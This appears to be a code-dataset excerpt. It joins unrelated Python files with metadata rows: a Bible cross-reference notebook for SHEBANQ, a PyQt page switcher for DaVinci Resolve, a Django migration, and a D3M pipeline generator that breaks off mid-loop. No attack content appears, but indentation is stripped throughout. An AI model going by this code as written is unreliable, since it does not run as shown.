"Compiled {} cross references into {} notes".format(nCrossrefs, len(refsCompiled)),
)
# In[34]:
# In[ ]:
sfields = """
version
book
chapter
verse
clause_atom
is_shared
is_published
status
keywords
ntext
""".strip().split()
# In[ ]:
sfields_fmt = ("{}\t" * (len(sfields) - 1)) + "{}\n"
# In[ ]:
ofs = open("{}/{}".format(thisNotes, notesFile), "w")
ofs.write("{}\n".format("\t".join(sfields)))
# In[ ]:
for (v, refs) in refsCompiled:
firstWord = L.d(v, otype="word")[0]
ca = F.number.v(L.u(firstWord, otype="clause_atom")[0])
(bk, ch, vs) = T.sectionFromNode(v, lang="la")
ofs.write(
sfields_fmt.format(
VERSION,
bk,
ch,
vs,
ca,
"T",
"",
CROSSREF_STATUS,
CROSSREF_KEYWORD,
refs,
)
)
# In[34]:
utils.caption(0, "Generated {} notes".format(len(refsCompiled)))
ofs.close()
# # Diffs
#
# Check differences with previous versions.
# In[35]:
# In[35]:
utils.checkDiffs(thisTempTf, thisTf, only=set(newFeatures))
# # Deliver
#
# Copy the new TF feature from the temporary location where it has been created to its final destination.
# In[36]:
# In[36]:
utils.deliverDataset(thisTempTf, thisTf)
# # Compile TF
# In[38]:
# In[ ]:
utils.caption(4, "Load and compile the new TF features")
# In[38]:
TF = Fabric(locations=[coreTf, thisTf], modules=[""])
api = TF.load(newFeatureStr)
api.makeAvailableIn(globals())
# # Examples
# We list all the crossrefs that the verses of Genesis 10 are involved in.
# In[39]:
# In[ ]:
utils.caption(4, "Test: crossrefs of Genesis 10")
# In[ ]:
chapter = ("Genesis", 10)
chapterNode = T.nodeFromSection(chapter)
startVerses = {}
# In[39]:
for method in ["", "SET", "LCS"]:
utils.caption(0, "\tMethod {}".format(method))
for verseNode in L.d(chapterNode, otype="verse"):
crossrefs = Es("crossref{}".format(method)).f(verseNode)
if crossrefs:
startVerses[T.sectionFromNode(verseNode)] = crossrefs
utils.caption(0, "\t\t{} start verses".format(len(startVerses)))
for (start, crossrefs) in sorted(startVerses.items()):
utils.caption(0, "\t\t{} {}:{}".format(*start), continuation=True)
for (target, confidence) in crossrefs:
utils.caption(
0,
"\t\t{:>20} {:<20} confidende {:>3}%".format(
"-" * 10 + ">",
"{} {}:{}".format(*T.sectionFromNode(target)),
confidence,
),
)
# In[29]:
# In[29]:
if SCRIPT:
stop(good=True)
# # 6b. SHEBANQ annotations
#
# The code below generates extensive crossref notes for `4b`, including clique overviews and chapter diffs.
# But since the pipeline in October 2017, we generate much simpler notes.
# That code is above.
#
# We retain this code here, in case we want to expand the crossref functionality in the future again.
#
# Based on selected similarity matrices, we produce a SHEBANQ note set of cross references for similar passages.
# In[30]:
# In[ ]:
def get_verse(i, ca=False):
return get_verse_w(chunks[i][0], ca=ca)
# In[ ]:
def get_verse_o(o, ca=False):
return get_verse_w(L.d(o, otype="word")[0], ca=ca)
# In[ ]:
def get_verse_w(w, ca=False):
book = F.book.v(L.u(w, otype="book")[0])
chapter = F.chapter.v(L.u(w, otype="chapter")[0])
verse = F.verse.v(L.u(w, otype="verse")[0])
if ca:
ca = F.number.v(L.u(w, otype="clause_atom")[0])
return (book, chapter, verse, ca) if ca else (book, chapter, verse)
# In[ ]:
def key_verse(x):
return (book_rank[x[0]], int(x[1]), int(x[2]))
# In[ ]:
MAX_REFS = 10
# In[ ]:
def condensex(vlabels):
cnd = []
(cur_b, cur_c) = (None, None)
for (b, c, v, d) in vlabels:
sep = (
""
if cur_b is None
else ". "
if cur_b != b
else "; "
if cur_c != c
else ", "
)
show_b = b + " " if cur_b != b else ""
show_c = c + ":" if cur_b != b or cur_c != c else ""
(cur_b, cur_c) = (b, c)
cnd.append("{}{}{}{}{}".format(sep, show_b, show_c, v, d))
return cnd
# In[ ]:
dfields = """
book1
chapter1
verse1
book2
chapter2
verse2
similarity
""".strip().split()
# In[ ]:
dfields_fmt = ("{}\t" * (len(dfields) - 1)) + "{}\n"
# In[ ]:
def get_crossrefs():
global crossrefs
TF.info("CROSSREFS: Fetching crossrefs")
crossrefs_proto = {}
crossrefs = {}
(chunk_f, chunk_i, sim_m) = SHEBANQ_MATRIX
sim_thr = SHEBANQ_SIMILARITY
(do_chunk, do_prep, do_sim, do_clique, skip) = do_params(
chunk_f, chunk_i, sim_m, sim_thr
)
if skip:
return
TF.info(
"CROSSREFS ({} {} {} S>{})".format(CHUNK_LBS[chunk_f], chunk_i, sim_m, sim_thr)
)
crossrefs_proto = {x for x in chunk_dist.items() if x[1] >= sim_thr}
TF.info(
"CROSSREFS ({} {} {} S>{}): found {} pairs".format(
CHUNK_LBS[chunk_f],
chunk_i,
sim_m,
sim_thr,
len(crossrefs_proto),
)
)
f = open(CROSSREF_DB_PATH, "w")
f.write("{}\n".format("\t".join(dfields)))
for ((x, y), d) in crossrefs_proto:
vx = get_verse(x)
vy = get_verse(y)
rd = int(round(d))
crossrefs.setdefault(x, {})[vy] = rd
crossrefs.setdefault(y, {})[vx] = rd
f.write(dfields_fmt.format(*(vx + vy + (rd,))))
total = sum(len(x) for x in crossrefs.values())
f.close()
TF.info(
"CROSSREFS: Found {} crossreferences and wrote {} pairs".format(
total, len(crossrefs_proto)
)
)
# In[ ]:
def get_specific_crossrefs(chunk_f, chunk_i, sim_m, sim_thr, write_to):
(do_chunk, do_prep, do_sim, do_clique, skip) = do_params(
chunk_f, chunk_i, sim_m, sim_thr
)
if skip:
return
chunking(do_chunk)
preparing(do_prep)
similarity(do_sim)
TF.info("CROSSREFS: Fetching crossrefs")
crossrefs_proto = {}
crossrefs = {}
(do_chunk, do_prep, do_sim, do_clique, skip) = do_params(
chunk_f, chunk_i, sim_m, sim_thr
)
if skip:
return
TF.info(
"CROSSREFS ({} {} {} S>{})".format(CHUNK_LBS[chunk_f], chunk_i, sim_m, sim_thr)
)
crossrefs_proto = {x for x in chunk_dist.items() if x[1] >= sim_thr}
TF.info(
"CROSSREFS ({} {} {} S>{}): found {} pairs".format(
CHUNK_LBS[chunk_f],
chunk_i,
sim_m,
sim_thr,
len(crossrefs_proto),
)
)
f = open("files/{}".format(write_to), "w")
f.write("{}\n".format("\t".join(dfields)))
for ((x, y), d) in crossrefs_proto:
vx = get_verse(x)
vy = get_verse(y)
rd = int(round(d))
crossrefs.setdefault(x, {})[vy] = rd
crossrefs.setdefault(y, {})[vx] = rd
f.write(dfields_fmt.format(*(vx + vy + (rd,))))
total = sum(len(x) for x in crossrefs.values())
f.close()
TF.info(
"CROSSREFS: Found {} crossreferences and wrote {} pairs".format(
total, len(crossrefs_proto)
)
)
# In[ ]:
def compile_refs():
global refs_compiled
refs_grouped = []
for x in sorted(crossrefs):
refs = crossrefs[x]
vys = sorted(refs.keys(), key=key_verse)
currefs = []
for vy in vys:
nr = len(currefs)
if nr == MAX_REFS:
refs_grouped.append((x, tuple(currefs)))
currefs = []
currefs.append(vy)
if len(currefs):
refs_grouped.append((x, tuple(currefs)))
refs_compiled = []
for (x, vys) in refs_grouped:
vysd = [(vy[0], vy[1], vy[2], " ~{}%".format(crossrefs[x][vy])) for vy in vys]
vysl = condensex(vysd)
these_refs = []
for (i, vy) in enumerate(vysd):
link_text = vysl[i]
link_target = "{} {}:{}".format(vy[0], vy[1], vy[2])
these_refs.append("[{}]({})".format(link_text, link_target))
refs_compiled.append((x, " ".join(these_refs)))
TF.info(
"CROSSREFS: Compiled cross references into {} notes".format(len(refs_compiled))
)
# In[ ]:
def get_chapter_diffs():
global chapter_diffs
chapter_diffs = []
for cl in sorted(bin_cliques):
lb1 = "{} {}".format(F.book.v(cl[0][0]), F.chapter.v(cl[0][1]))
lb2 = "{} {}".format(F.book.v(cl[1][0]), F.chapter.v(cl[1][1]))
hfilename = "{}_vs_{}.html".format(lb1, lb2).replace(" ", "_")
chapter_diffs.append(
(
lb1,
cl[0][1],
lb2,
cl[1][1],
"{}/{}/{}/{}".format(
SHEBANQ_TOOL,
LOCAL_BASE_OUTP,
CHAPTER_DIR,
hfilename,
),
)
)
TF.info("CROSSREFS: Added {} chapter diffs".format(2 * len(chapter_diffs)))
# In[ ]:
def get_clique_refs():
global clique_refs
clique_refs = []
for (i, c) in enumerate(cliques):
for j in c:
seq = i // CLIQUES_PER_FILE
clique_refs.append(
(
j,
i,
"{}/{}/{}/{}/clique_{}_{}.html#c_{}".format(
SHEBANQ_TOOL,
LOCAL_BASE_OUTP,
EXPERIMENT_DIR,
base_name,
base_name,
seq,
i,
),
)
)
TF.info("CROSSREFS: Added {} clique references".format(len(clique_refs)))
# In[ ]:
sfields = """
version
book
chapter
verse
clause_atom
is_shared
is_published
status
keywords
ntext
""".strip().split()
# In[ ]:
sfields_fmt = ("{}\t" * (len(sfields) - 1)) + "{}\n"
# In[ ]:
def generate_notes():
with open(NOTES_PATH, "w") as f:
f.write("{}\n".format("\t".join(sfields)))
x = next(F.otype.s("word"))
(bk, ch, vs, ca) = get_verse(x, ca=True)
f.write(
sfields_fmt.format(
VERSION,
bk,
ch,
vs,
ca,
"T",
"",
CROSSREF_STATUS,
CROSSREF_KEYWORD,
"""The crossref notes are the result of a computation without manual tweaks.
Parameters: chunk by verse, similarity method SET with threshold 65.
[Here](tool=parallel) is an account of the generation method.""".replace(
"\n", " "
),
)
)
for (lb1, ch1, lb2, ch2, fl) in chapter_diffs:
(bk1, ch1, vs1, ca1) = get_verse_o(ch1, ca=True)
(bk2, ch2, vs2, ca2) = get_verse_o(ch2, ca=True)
f.write(
sfields_fmt.format(
VERSION,
bk1,
ch1,
vs1,
ca1,
"T",
"",
CROSSREF_STATUS,
CROSSREF_KEYWORD,
"[chapter diff with {}](tool:{})".format(lb2, fl),
)
)
f.write(
sfields_fmt.format(
VERSION,
bk2,
ch2,
vs2,
ca2,
"T",
"",
CROSSREF_STATUS,
CROSSREF_KEYWORD,
"[chapter diff with {}](tool:{})".format(lb1, fl),
)
)
for (x, refs) in refs_compiled:
(bk, ch, vs, ca) = get_verse(x, ca=True)
f.write(
sfields_fmt.format(
VERSION,
bk,
ch,
vs,
ca,
"T",
"",
CROSSREF_STATUS,
CROSSREF_KEYWORD,
refs,
)
)
for (chunk, clique, fl) in clique_refs:
(bk, ch, vs, ca) = get_verse(chunk, ca=True)
f.write(
sfields_fmt.format(
VERSION,
bk,
ch,
vs,
ca,
"T",
"",
CROSSREF_STATUS,
CROSSREF_KEYWORD,
"[all variants (clique {})](tool:{})".format(clique, fl),
)
)
TF.info(
"CROSSREFS: Generated {} notes".format(
1 + len(refs_compiled) + 2 * len(chapter_diffs) + len(clique_refs)
)
)
# In[30]:
def crossrefs2shebanq():
expr = SHEBANQ_MATRIX + (SHEBANQ_SIMILARITY,)
do_experiment(*(expr + (True,)))
get_crossrefs()
compile_refs()
get_chapter_diffs()
get_clique_refs()
generate_notes()
# # 7. Main
#
# In the cell below you can select the experiments you want to carry out.
#
# The previous cells contain just definitions and parameters.
# The next cell will do work.
#
# If none of the matrices and cliques have been computed before on the system where this runs, doing all experiments might take multiple hours (4-8).
# In[ ]:
# In[ ]:
reset_params()
# do_experiment(False, 'sentence', 'LCS', 60, False)
# In[ ]:
do_all_experiments()
# do_all_experiments(no_fixed=True, only_object='chapter')
# crossrefs2shebanq()
# show_all_experiments()
# get_specific_crossrefs(False, 'verse', 'LCS', 60, 'crossrefs_lcs_db.txt')
# do_all_chunks()
# In[ ]:
# In[ ]:
HTML(ecss)
# # 8. Overview of the similarities
#
# Here are the plots of two similarity matrices
# * with verses as chunks and SET as similarity method
# * with verses as chunks and LCS as similarity method
#
# Horizontally you see the degree of similarity from 0 to 100%, vertically the number of pairs that have that (rounded) similarity. This axis is logarithmic.
# In[ ]:
# In[ ]:
do_experiment(False, "verse", "SET", 60, False)
distances = collections.Counter()
for (x, d) in chunk_dist.items():
distances[int(round(d))] += 1
# In[ ]:
x = range(MATRIX_THRESHOLD, 101)
fig = plt.figure(figsize=[15, 4])
plt.plot(x, [math.log(max((1, distances[y]))) for y in x], "b-")
plt.axis([MATRIX_THRESHOLD, 101, 0, 15])
plt.xlabel("similarity as %")
plt.ylabel("log # similarities")
plt.xticks(x, x, rotation="vertical")
plt.margins(0.2)
plt.subplots_adjust(bottom=0.15)
plt.title("distances")
# In[ ]:
# In[ ]:
do_experiment(False, "verse", "LCS", 60, False)
distances = collections.Counter()
for (x, d) in chunk_dist.items():
distances[int(round(d))] += 1
# In[ ]:
x = range(MATRIX_THRESHOLD, 101)
fig = plt.figure(figsize=[15, 4])
plt.plot(x, [math.log(max((1, distances[y]))) for y in x], "b-")
plt.axis([MATRIX_THRESHOLD, 101, 0, 15])
plt.xlabel("similarity as %")
plt.ylabel("log # similarities")
plt.xticks(x, x, rotation="vertical")
plt.margins(0.2)
plt.subplots_adjust(bottom=0.15)
plt.title("distances")
# In[ ]:
| 30.896048 | 6,888 | 0.579503 | 14,238 | 107,889 | 4.290982 | 0.114623 | 0.013749 | 0.009232 | 0.010737 | 0.373255 | 0.318209 | 0.266749 | 0.233374 | 0.215386 | 0.200818 | 0 | 0.023555 | 0.288167 | 107,889 | 3,491 | 6,889 | 30.904898 | 0.771963 | 0.355773 | 0 | 0.460823 | 0 | 0.005877 | 0.151934 | 0.017051 | 0 | 0 | 0 | 0 | 0 | 1 | 0.028893 | false | 0.008815 | 0.007346 | 0.004897 | 0.056807 | 0.008815 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a1586b7c08a86b032589e3a797f710af94eef3ed | 4,947 | py | Python | ResolvePageSwitcher.py | IgorRidanovic/DaVinciResolve-PageSwitcher | 5a771d8fa319454dbcf986b8921e5fa0c665baa9 | [
"MIT"
] | 17 | 2018-06-01T07:30:33.000Z | 2021-12-22T21:05:29.000Z | ResolvePageSwitcher.py | IgorRidanovic/DaVinciResolve-PageSwitcher | 5a771d8fa319454dbcf986b8921e5fa0c665baa9 | [
"MIT"
] | 2 | 2018-10-23T17:32:45.000Z | 2020-12-09T07:48:06.000Z | ResolvePageSwitcher.py | IgorRidanovic/DaVinciResolve-PageSwitcher | 5a771d8fa319454dbcf986b8921e5fa0c665baa9 | [
"MIT"
] | 5 | 2018-09-06T02:11:56.000Z | 2020-10-25T11:25:22.000Z | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# DaVinci Resolve scripting proof of concept. Resolve page external switcher.
# Local or TCP/IP control mode.
# Refer to Resolve V15 public beta 2 scripting API documentation for host setup.
# Copyright 2018 Igor Riđanović, www.hdhead.com
from PyQt4 import QtCore, QtGui
import sys
import socket
# If API module not found assume we're working as a remote control
try:
import DaVinciResolveScript
#Instantiate Resolve object
resolve = DaVinciResolveScript.scriptapp('Resolve')
checkboxState = False
except ImportError:
print 'Resolve API not found.'
checkboxState = True
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_Form(object):
def setupUi(self, Form):
Form.setObjectName(_fromUtf8('Resolve Page Switcher'))
Form.resize(561, 88)
Form.setStyleSheet(_fromUtf8('background-color: #282828;\
border-color: #555555;\
color: #929292;\
font-size: 13px;'\
))
self.horizontalLayout = QtGui.QHBoxLayout(Form)
self.horizontalLayout.setObjectName(_fromUtf8('horizontalLayout'))
self.mediaButton = QtGui.QPushButton(Form)
self.mediaButton.setObjectName(_fromUtf8('mediaButton'))
self.horizontalLayout.addWidget(self.mediaButton)
self.editButton = QtGui.QPushButton(Form)
self.editButton.setObjectName(_fromUtf8('editButton'))
self.horizontalLayout.addWidget(self.editButton)
self.fusionButton = QtGui.QPushButton(Form)
self.fusionButton.setObjectName(_fromUtf8('fusionButton'))
self.horizontalLayout.addWidget(self.fusionButton)
self.colorButton = QtGui.QPushButton(Form)
self.colorButton.setObjectName(_fromUtf8('colorButton'))
self.horizontalLayout.addWidget(self.colorButton)
self.fairlightButton = QtGui.QPushButton(Form)
self.fairlightButton.setObjectName(_fromUtf8('fairlightButton'))
self.horizontalLayout.addWidget(self.fairlightButton)
self.deliverButton = QtGui.QPushButton(Form)
self.deliverButton.setObjectName(_fromUtf8('deliverButton'))
self.horizontalLayout.addWidget(self.deliverButton)
self.tcpipcheckBox = QtGui.QCheckBox(Form)
self.tcpipcheckBox.setObjectName(_fromUtf8('tcpipcheckBox'))
self.tcpipcheckBox.setChecked(checkboxState)
self.horizontalLayout.addWidget(self.tcpipcheckBox)
self.mediaButton.clicked.connect(lambda: self.pageswitch('media'))
self.editButton.clicked.connect(lambda: self.pageswitch('edit'))
self.fusionButton.clicked.connect(lambda: self.pageswitch('fusion'))
self.colorButton.clicked.connect(lambda: self.pageswitch('color'))
self.fairlightButton.clicked.connect(lambda: self.pageswitch('fairlight'))
self.deliverButton.clicked.connect(lambda: self.pageswitch('deliver'))
self.mediaButton.setStyleSheet(_fromUtf8('background-color: #181818;'))
self.editButton.setStyleSheet(_fromUtf8('background-color: #181818;'))
self.fusionButton.setStyleSheet(_fromUtf8('background-color: #181818;'))
self.colorButton.setStyleSheet(_fromUtf8('background-color: #181818;'))
self.fairlightButton.setStyleSheet(_fromUtf8('background-color: #181818;'))
self.deliverButton.setStyleSheet(_fromUtf8('background-color: #181818;'))
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
Form.setWindowTitle(_translate('Resolve Page Switcher',\
'Resolve Page Switcher', None))
self.mediaButton.setText(_translate('Form', 'Media', None))
self.editButton.setText(_translate('Form', 'Edit', None))
self.fusionButton.setText(_translate('Form', 'Fusion', None))
self.colorButton.setText(_translate('Form', 'Color', None))
self.fairlightButton.setText(_translate('Form', 'Fairlight', None))
self.deliverButton.setText(_translate('Form', 'Deliver', None))
self.tcpipcheckBox.setText(_translate("Form", "TCP/IP remote", None))
def send(self, message):
s = socket.socket()
try:
s.connect((server, port))
except socket.error:
print 'Server unavailable. Exiting.'
s.send(message)
return s.recv(32)
def pageswitch(self, page):
# Send page name to server to switch remote Resolve's page
if self.tcpipcheckBox.isChecked():
response = self.send(page)
print 'Server echo:', response
# Switch local Resolve's page if API is available
else:
try:
resolve.OpenPage(page)
print 'Switched to', page
except NameError:
print 'Resolve API not found. Run in remote mode instead?'
if __name__ == '__main__':
# Assign server parameters
server = '192.168.1.1'
port = 7779
app = QtGui.QApplication(sys.argv)
Form = QtGui.QWidget()
ui = Ui_Form()
ui.setupUi(Form)
Form.show()
sys.exit(app.exec_())
| 36.91791 | 80 | 0.761472 | 559 | 4,947 | 6.665474 | 0.296959 | 0.050725 | 0.058239 | 0.067633 | 0.185185 | 0.118089 | 0.044015 | 0.044015 | 0.044015 | 0.044015 | 0 | 0.023766 | 0.115423 | 4,947 | 133 | 81 | 37.195489 | 0.827697 | 0.100061 | 0 | 0.084906 | 0 | 0 | 0.131081 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.04717 | null | null | 0.04717 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a15c583b91868493579d97f1c0cb3471ef7cba0e | 442 | py | Python | myaxf/migrations/0011_minebtns_is_used.py | Pyrans/test1806 | 1afc62e09bbebf74521b4b6fdafde8eeaa260ed9 | [
"Apache-2.0"
] | null | null | null | myaxf/migrations/0011_minebtns_is_used.py | Pyrans/test1806 | 1afc62e09bbebf74521b4b6fdafde8eeaa260ed9 | [
"Apache-2.0"
] | null | null | null | myaxf/migrations/0011_minebtns_is_used.py | Pyrans/test1806 | 1afc62e09bbebf74521b4b6fdafde8eeaa260ed9 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2018-11-06 01:54
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('myaxf', '0010_minebtns'),
]
operations = [
migrations.AddField(
model_name='minebtns',
name='is_used',
field=models.BooleanField(default=True),
),
]
| 21.047619 | 52 | 0.608597 | 48 | 442 | 5.4375 | 0.791667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.065217 | 0.271493 | 442 | 20 | 53 | 22.1 | 0.745342 | 0.153846 | 0 | 0 | 1 | 0 | 0.088949 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.153846 | 0 | 0.384615 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a15d6cd6a92c370d9583f2a5012f9737df67a02a | 10,453 | py | Python | generate_pipelines.py | phorne-uncharted/d3m-primitives | 77d900b9dd6ab4b2b330f4e969dabcdc419c73e1 | [
"MIT"
] | null | null | null | generate_pipelines.py | phorne-uncharted/d3m-primitives | 77d900b9dd6ab4b2b330f4e969dabcdc419c73e1 | [
"MIT"
] | null | null | null | generate_pipelines.py | phorne-uncharted/d3m-primitives | 77d900b9dd6ab4b2b330f4e969dabcdc419c73e1 | [
"MIT"
] | null | null | null | """
Utility to get generate all submission pipelines for all primitives.
This script assumes that `generate_annotations.py` has already been run.
"""
import os
import subprocess
import shutil
import fire
from kf_d3m_primitives.data_preprocessing.data_cleaning.data_cleaning_pipeline import DataCleaningPipeline
from kf_d3m_primitives.data_preprocessing.text_summarization.duke_pipeline import DukePipeline
from kf_d3m_primitives.data_preprocessing.geocoding_forward.goat_forward_pipeline import GoatForwardPipeline
from kf_d3m_primitives.data_preprocessing.geocoding_reverse.goat_reverse_pipeline import GoatReversePipeline
from kf_d3m_primitives.data_preprocessing.data_typing.simon_pipeline import SimonPipeline
from kf_d3m_primitives.clustering.spectral_clustering.spectral_clustering_pipeline import SpectralClusteringPipeline
from kf_d3m_primitives.clustering.k_means.storc_pipeline import StorcPipeline
from kf_d3m_primitives.clustering.hdbscan.hdbscan_pipeline import HdbscanPipeline
from kf_d3m_primitives.dimensionality_reduction.tsne.tsne_pipeline import TsnePipeline
from kf_d3m_primitives.feature_selection.pca_features.pca_features_pipeline import PcaFeaturesPipeline
from kf_d3m_primitives.feature_selection.rf_features.rf_features_pipeline import RfFeaturesPipeline
from kf_d3m_primitives.natural_language_processing.sent2vec.sent2vec_pipeline import Sent2VecPipeline
from kf_d3m_primitives.object_detection.retinanet.object_detection_retinanet_pipeline import ObjectDetectionRNPipeline
from kf_d3m_primitives.image_classification.imagenet_transfer_learning.gator_pipeline import GatorPipeline
from kf_d3m_primitives.ts_classification.knn.kanine_pipeline import KaninePipeline
from kf_d3m_primitives.ts_classification.lstm_fcn.lstm_fcn_pipeline import LstmFcnPipeline
from kf_d3m_primitives.ts_forecasting.vector_autoregression.var_pipeline import VarPipeline
from kf_d3m_primitives.ts_forecasting.deep_ar.deepar_pipeline import DeepARPipeline
from kf_d3m_primitives.ts_forecasting.nbeats.nbeats_pipeline import NBEATSPipeline
from kf_d3m_primitives.remote_sensing.classifier.mlp_classifier_pipeline import MlpClassifierPipeline
def generate_pipelines(gpu = False):
gpu_prims = [
"d3m.primitives.classification.inceptionV3_image_feature.Gator",
"d3m.primitives.object_detection.retina_net.ObjectDetectionRN",
"d3m.primitives.time_series_classification.convolutional_neural_net.LSTM_FCN",
"d3m.primitives.feature_extraction.nk_sent2vec.Sent2Vec",
"d3m.primitives.remote_sensing.mlp.MlpClassifier"
]
prims_to_pipelines = {
"d3m.primitives.data_cleaning.column_type_profiler.Simon": [
(SimonPipeline(), ('185_baseball_MIN_METADATA',))
],
"d3m.primitives.data_cleaning.geocoding.Goat_forward": [
(GoatForwardPipeline(), ('LL0_acled_reduced_MIN_METADATA',))
],
"d3m.primitives.data_cleaning.geocoding.Goat_reverse": [
(GoatReversePipeline(), ('LL0_acled_reduced_MIN_METADATA',))
],
"d3m.primitives.feature_extraction.nk_sent2vec.Sent2Vec": [
(Sent2VecPipeline(), ('LL1_TXT_CLS_apple_products_sentiment_MIN_METADATA',))
],
"d3m.primitives.clustering.k_means.Sloth": [
(StorcPipeline(), ('66_chlorineConcentration_MIN_METADATA',))
],
"d3m.primitives.clustering.hdbscan.Hdbscan": [
(HdbscanPipeline(), ('SEMI_1044_eye_movements_MIN_METADATA',))
],
"d3m.primitives.clustering.spectral_graph.SpectralClustering": [
(SpectralClusteringPipeline(), ('SEMI_1044_eye_movements_MIN_METADATA',))
],
"d3m.primitives.dimensionality_reduction.t_distributed_stochastic_neighbor_embedding.Tsne": [
(TsnePipeline(), ('SEMI_1044_eye_movements_MIN_METADATA',))
],
"d3m.primitives.time_series_classification.k_neighbors.Kanine": [
(KaninePipeline(), ('66_chlorineConcentration_MIN_METADATA',))
],
"d3m.primitives.time_series_classification.convolutional_neural_net.LSTM_FCN": [
(LstmFcnPipeline(), (
'66_chlorineConcentration_MIN_METADATA',
"LL1_Adiac_MIN_METADATA",
"LL1_ArrowHead_MIN_METADATA",
"LL1_Cricket_Y_MIN_METADATA",
"LL1_ECG200_MIN_METADATA",
"LL1_ElectricDevices_MIN_METADATA",
"LL1_FISH_MIN_METADATA",
"LL1_FaceFour_MIN_METADATA",
"LL1_HandOutlines_MIN_METADATA",
"LL1_Haptics_MIN_METADATA",
"LL1_ItalyPowerDemand_MIN_METADATA",
"LL1_Meat_MIN_METADATA",
"LL1_OSULeaf_MIN_METADATA",
)),
(LstmFcnPipeline(attention_lstm=True), (
'66_chlorineConcentration_MIN_METADATA',
"LL1_Adiac_MIN_METADATA",
"LL1_ArrowHead_MIN_METADATA",
"LL1_Cricket_Y_MIN_METADATA",
"LL1_ECG200_MIN_METADATA",
"LL1_ElectricDevices_MIN_METADATA",
"LL1_FISH_MIN_METADATA",
"LL1_FaceFour_MIN_METADATA",
"LL1_HandOutlines_MIN_METADATA",
"LL1_Haptics_MIN_METADATA",
"LL1_ItalyPowerDemand_MIN_METADATA",
"LL1_Meat_MIN_METADATA",
"LL1_OSULeaf_MIN_METADATA",
))
],
"d3m.primitives.time_series_forecasting.vector_autoregression.VAR": [
(VarPipeline(), (
'56_sunspots_MIN_METADATA',
'56_sunspots_monthly_MIN_METADATA',
'LL1_736_population_spawn_MIN_METADATA',
'LL1_736_stock_market_MIN_METADATA',
'LL1_terra_canopy_height_long_form_s4_100_MIN_METADATA',
"LL1_terra_canopy_height_long_form_s4_90_MIN_METADATA",
"LL1_terra_canopy_height_long_form_s4_80_MIN_METADATA",
"LL1_terra_canopy_height_long_form_s4_70_MIN_METADATA",
'LL1_terra_leaf_angle_mean_long_form_s4_MIN_METADATA',
'LL1_PHEM_Monthly_Malnutrition_MIN_METADATA',
'LL1_PHEM_weeklyData_malnutrition_MIN_METADATA',
))
],
"d3m.primitives.time_series_forecasting.lstm.DeepAR": [
(DeepARPipeline(prediction_length = 21, context_length = 21), ('56_sunspots_MIN_METADATA',)),
(DeepARPipeline(prediction_length = 38, context_length = 38), ('56_sunspots_monthly_MIN_METADATA',)),
(DeepARPipeline(prediction_length = 60, context_length = 30), ('LL1_736_population_spawn_MIN_METADATA',)),
(DeepARPipeline(prediction_length = 34, context_length = 17), ('LL1_736_stock_market_MIN_METADATA',)),
],
"d3m.primitives.time_series_forecasting.feed_forward_neural_net.NBEATS": [
(NBEATSPipeline(prediction_length = 21), ('56_sunspots_MIN_METADATA',)),
(NBEATSPipeline(prediction_length = 38), ('56_sunspots_monthly_MIN_METADATA',)),
(NBEATSPipeline(prediction_length = 60), ('LL1_736_population_spawn_MIN_METADATA',)),
(NBEATSPipeline(prediction_length = 34), ('LL1_736_stock_market_MIN_METADATA',)),
],
"d3m.primitives.object_detection.retina_net.ObjectDetectionRN": [
(ObjectDetectionRNPipeline(), (
'LL1_tidy_terra_panicle_detection_MIN_METADATA',
'LL1_penn_fudan_pedestrian_MIN_METADATA'
))
],
"d3m.primitives.data_cleaning.data_cleaning.Datacleaning": [
(DataCleaningPipeline(), ('185_baseball_MIN_METADATA',))
],
"d3m.primitives.data_cleaning.text_summarization.Duke": [
(DukePipeline(), ('185_baseball_MIN_METADATA',))
],
"d3m.primitives.feature_selection.pca_features.Pcafeatures": [
(PcaFeaturesPipeline(), ('185_baseball_MIN_METADATA',))
],
"d3m.primitives.feature_selection.rffeatures.Rffeatures": [
(RfFeaturesPipeline(), ('185_baseball_MIN_METADATA',))
],
"d3m.primitives.classification.inceptionV3_image_feature.Gator": [
(GatorPipeline(), (
"124_174_cifar10_MIN_METADATA",
"124_188_usps_MIN_METADATA",
"124_214_coil20_MIN_METADATA",
"uu_101_object_categories_MIN_METADATA",
))
],
"d3m.primitives.remote_sensing.mlp.MlpClassifier": [
(MlpClassifierPipeline(), ('LL1_bigearth_landuse_detection',))
]
}
for primitive, pipelines in prims_to_pipelines.items():
if gpu:
if primitive not in gpu_prims:
continue
else:
if primitive in gpu_prims:
continue
os.chdir(f'/annotations/{primitive}')
os.chdir(os.listdir('.')[0])
if not os.path.isdir('pipelines'):
os.mkdir('pipelines')
else:
[os.remove(f'pipelines/{pipeline}') for pipeline in os.listdir('pipelines')]
if not os.path.isdir('pipeline_runs'):
os.mkdir('pipeline_runs')
else:
